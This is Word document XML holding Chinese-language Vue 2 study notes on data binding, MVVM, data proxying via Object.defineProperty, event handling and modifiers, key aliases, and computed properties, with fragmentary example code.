    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·单向数据绑定</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 语法</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-- v-bind:href ="xxx" 或简写为 :href</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 特点</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-- 数据只能从data 流向页面</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·双向数据绑定</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 语法</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-- v-mode:value="xxx" 或简写为 v-model="xxx"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/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数据绑定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普通写法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单向数据绑定：&lt;input type="text" v-bind:value="name"&gt;&lt;br/&gt;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双向数据绑定：&lt;input type="text" v-model:value="name"&gt;&lt;br/&gt;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简写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单向数据绑定：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双向数据绑定：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如下代码是错误的，因为v-model只能应用在表单类元素（输入类元素）上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 v-model:x="name"&gt;你好啊&lt;/h2&gt;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el与data的两种写法</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·el的2种写法</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>new Vue时候配置el属性</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>先创建Vue实例，随后再通过vm.$mount('#root')指定el的值</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·data有2种写法</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象式</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数式</w:t>
      </w:r>
    </w:p>
    <w:p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如何选择：目前哪种写法都可以，以后学习到组件时，data必须使用函数式，否则会报错</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·一个重要的原则</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>由Vue管理的函数，一定不要写箭头函数，一旦写了箭头函数，this就不再是Vue实例了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el与data的两种写法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你好，{{name}}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//el的两种写法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const v = new Vue({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//el:'#root', //第一种写法。绑定标签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data:{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name:'尚硅谷'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console.log(v)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v.$mount('#root') //第二种写法。绑定标签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//data的两种写法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//data的第一种写法：对象式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data:{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name:'尚硅谷'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//data的第二种写法：函数式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'@@@'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//此处的this是Vue实例对象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MVVM模型</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">·M：模型(Model) </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 对应data 中的数据</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·V：视图(View)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 模板</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">·VM：视图模型(ViewModel) </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- Vue 实例对象</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4289425" cy="2526665"/>
            <wp:effectExtent l="0" t="0" r="8255" b="3175"/>
            <wp:docPr id="1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·data中所有的属性，最后都出现在了vm身上</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·vm身上所有的属性 及 Vue原型上所有属性，在Vue模板中都可以直接使用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理解MVVM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学校地址：{{address}}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&lt;h1&gt;测试一下1：{{1+1}}&lt;/h1&gt;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&lt;h1&gt;测试一下2：{{$options}}&lt;/h1&gt;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&lt;h1&gt;测试一下3：{{$emit}}&lt;/h1&gt;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&lt;h1&gt;测试一下4：{{_c}}&lt;/h1&gt;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t>Object.defineProperty</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>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回顾Object.defineproperty方法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//第一个参数是给哪个对象添加属性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//第二个参数是添加的属性名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//第三个参数是配置参数的对象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Object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defineProperty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value:18, //属性值是18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enumerable:true, //控制属性是否可以枚举，默认值是false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writable:true, //控制属性是否可以被修改，默认值是false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configurable:true //控制属性是否可以被删除，默认值是false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//当有人读取person的age属性时，get函数(getter)就会被调用，并将返回值赋值给age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get(){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console.log('有人读取age属性了')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return number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//当有人修改person的age属性时，set函数(setter)就会被调用，且会收到修改的具体值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set(value){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console.log('有人修改了age属性，且值是',value)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number = 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//Object.keys(person)将所有属性的属性名提取到一个数组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Object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keys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数据代理</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·通过一个对象代理对另一个对象中属性的操作（读/写）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何为数据代理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y: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//给obj2添加x属性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Object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defineProperty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//获取obj.x的值返回给x，也就是当obj.x的值修改时，obj2.x也修改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//当obj2.x的值修改时，obj.x也修改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vue中的数据代理</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·通过vm对象来代理data对象中属性的操作（读/写）</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·Vue中数据代理的好处</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>更加方便的操作data中的数据</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·基本原理</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 通过Object.defineProperty()把data对象中所有属性添加到vm上</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 为每一个添加到vm上的属性，都指定一个getter/setter</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 在getter/setter内部去操作（读/写）data中对应的属性</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="3291840"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="6" name="图片 6" descr="3f9aa69b1d73f950adfa2319f1f2b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f9aa69b1d73f950adfa2319f1f2b8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Vue中的数据代理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学校地址：{{address}}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'宏福科技园'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宋体" w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pP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事件处理</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>事件的基本使用</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·使用v-on:xxx 或 @xxx 绑定事件，其中xxx是事件名；</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·事件的回调需要配置在methods对象中，最终会在vm上；</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·methods中配置的函数，不要用箭头函数！否则this就不是vm了；</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·methods中配置的函数，都是被Vue所管理的函数，this的指向是vm 或 组件实例对象；</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·@click="demo" 和 @click="demo($event)" 效果一致，但后者可以传参；</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·methods是专门来写方法的，可以给vm添加方法，但不会做数据代理</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·如果将方法写到data里，也能使用，但是会做数据代理，可能会降低性能</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·v-on:xxx="fun"</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·@xxx="fun"</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·@xxx="fun(参数)"</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·默认事件形参: event</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·隐含属性对象: $event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事件的基本使用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欢迎来到{{name}}学习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&lt;!--使用v-on:xxx进行事件绑定--&gt;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v-on:click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v-on点我提示信息（不传参）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v-on简写形式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@click点我提示信息1（不传参）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&lt;!--使用@click="demo($event)传参，$event是鼠标事件，一定要传入，不然无法获得event参数--&gt;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"showInfo2($event,66)"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点我提示信息2（传参）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//配置事件回调方法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showInfo1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event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//event.target获取点击的元素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console.log(event.target.innerText)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console.log(this) //此处的this是vm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'同学你好！'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showInfo2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event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event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console.log(event.target.innerText)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console.log(this) //此处的this是vm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'同学你好！！'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eastAsia="Consolas" w:cs="Calibri"/>
          <w:color w:val="D4D4D4"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas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eastAsia="Consolas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eastAsia="Consolas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宋体" w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>事件修饰符</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·prevent : 阻止事件的默认行为</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 相当于event.preventDefault()</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">·stop : 停止事件冒泡 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 相当于event.stopPropagation()</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·修饰符可以连着写，有先后顺序</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">- @click.prevent.stop = </w:t>
      </w:r>
      <w:r>
        <w:t>“”</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·once：事件只触发一次（常用）</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·capture：使用事件的捕获模式</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·self：只有event.target是当前操作的元素时才触发事件</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·passive：事件的默认行为立即执行，无需等待事件回调执行完毕</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/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事件修饰符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*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.demo1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.box1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.box2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peru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overflow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欢迎来到{{name}}学习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prevent阻止默认事件（常用）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@click.prevent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点我提示信息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stop阻止事件冒泡（常用）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"demo1"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@click.stop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点我提示信息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修饰符可以连续写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&lt;a href="http://www.atguigu.com" @click.prevent.stop="showInfo"&gt;点我提示信息&lt;/a&gt;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once事件只触发一次（常用）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@click.once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点我提示信息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capture使用事件的捕获模式，捕获阶段开始处理事件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"box1"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@click.capture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"showMsg(1)"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div1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"box2"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"showMsg(2)"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div2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self只有event.target是当前操作的元素时才触发事件；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"demo1"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@click.self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点我提示信息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@wheel是鼠标滚轮滚动事件，事件的默认行为立即执行，无需等待事件回调执行完毕；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@wheel.passive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4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//原生js阻止浏览器默认行为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e.preventDefault();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//原生js阻止事件冒泡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e.stopPropagation();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'同学你好！'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console.log(e.target)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//接收数据的事件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&lt;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100000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++)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'累坏了'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宋体" w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>键盘事件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·Vue中常用的按键别名</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 回车 =&gt; enter</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 删除 =&gt; delete (捕获“删除”和“退格”键)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 退出 =&gt; esc</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 空格 =&gt; space</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 换行 =&gt; tab (特殊，必须配合keydown去使用)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 上 =&gt; up</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 下 =&gt; down</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 左 =&gt; left</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 右 =&gt; right</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·Vue未提供别名的按键，可以使用按键原始的key值去绑定，但注意要转为kebab-case（短横线命名）</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·系统修饰键（用法特殊）：ctrl、alt、shift、meta</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 配合keyup使用：按下修饰键的同时，再按下其他键，随后释放其他键，事件才被触发。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 配合keydown使用：正常触发事件。</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·也可以使用keyCode去指定具体的按键（不推荐）</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·Vue.config.keyCodes.自定义键名 = 键码，可以去定制按键别名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键盘事件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欢迎来到{{name}}学习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&lt;!--@keydown按下键盘响应事件--&gt;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type="text" placeholder="按下键盘提示输入" @keydown="showInfo"&gt;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&lt;!--@keydown.enter按下回车键响应事件--&gt;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type="text" placeholder="按下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="6A9955"/>
          <w:kern w:val="0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>回车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提示输入" @keydown.enter="showInfo"&gt;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使用定义的别名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type="text" placeholder="按下回车提示输入" @keydown.huiche="showInfo"&gt;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ctrl+y响应事件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"按下回车提示输入"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@keyup.ctrl.y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"showInfo"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keyCodes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huiche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//定义了一个回车编码别名按键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keyCode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//获取按键名和编码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console.log(e.target.value)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宋体" w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pP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计算属性</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·案例效果</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2470785" cy="1630680"/>
            <wp:effectExtent l="0" t="0" r="13335" b="0"/>
            <wp:docPr id="2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8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·当输入姓的时候，姓改变</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·当输入名的时候，名改变</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>插值语法实现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姓名案例_插值语法实现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姓：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"firstName"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"lastName"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全名：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{{firstName.slice(0,3)}}-{{lastName}}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'三'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methods实现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姓名案例_methods实现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只有数据发生改变，vue就会重新解析模板--&gt;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姓：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"firstName"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"lastName"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&lt;!--调用fullName()方法显示返回的数据--&gt;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全名：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{{fullName()}}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'三'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fullName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console.log('@---fullName')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'-'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计算属性实现</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·定义</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 要用的属性不存在，要通过已有属性计算得来</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·原理：底层借助了Objcet.defineproperty方法提供的getter和setter</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·get函数什么时候执行？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 初次读取时会执行一次</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 当依赖的数据发生改变时会被再次调用</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·优势：与methods实现相比，内部有缓存机制（复用），效率更高，调试方便</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·备注</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 计算属性最终会出现在vm上，直接读取使用即可</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 如果计算属性要被修改，那必须写set函数去响应修改，且set中要引起计算时依赖的数据发生改变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姓名案例_计算属性实现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姓：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"firstName"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"lastName"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测试：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全名：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{{fullName}}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全名：&lt;span&gt;{{fullName}}&lt;/span&gt; &lt;br/&gt;&lt;br/&gt;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全名：&lt;span&gt;{{fullName}}&lt;/span&gt; &lt;br/&gt;&lt;br/&gt;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全名：&lt;span&gt;{{fullName}}&lt;/span&gt;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//计算属性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fullName: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//get有什么作用？当有人读取fullName时，get就会被调用，且返回值就作为fullName的值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//get什么时候调用？1.初次读取fullName时。2.所依赖的数据发生变化时。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console.log('get被调用了')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console.log(this) //此处的this是vm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'-'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//set什么时候调用? 当fullName被修改时。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//set不是必须写的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'set'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//分割字符串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split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'-'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//将被修改的姓赋值给firstName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//将被修改的名赋值给lastName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计算属性简写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姓名案例_计算属性实现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姓：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"firstName"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"lastName"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全名：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{{fullName}}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//完整写法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fullName:{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get(){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console.log('get被调用了')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return this.firstName + '-' + this.lastName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set(value){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console.log('set',value)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const arr = value.split('-')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this.firstName = 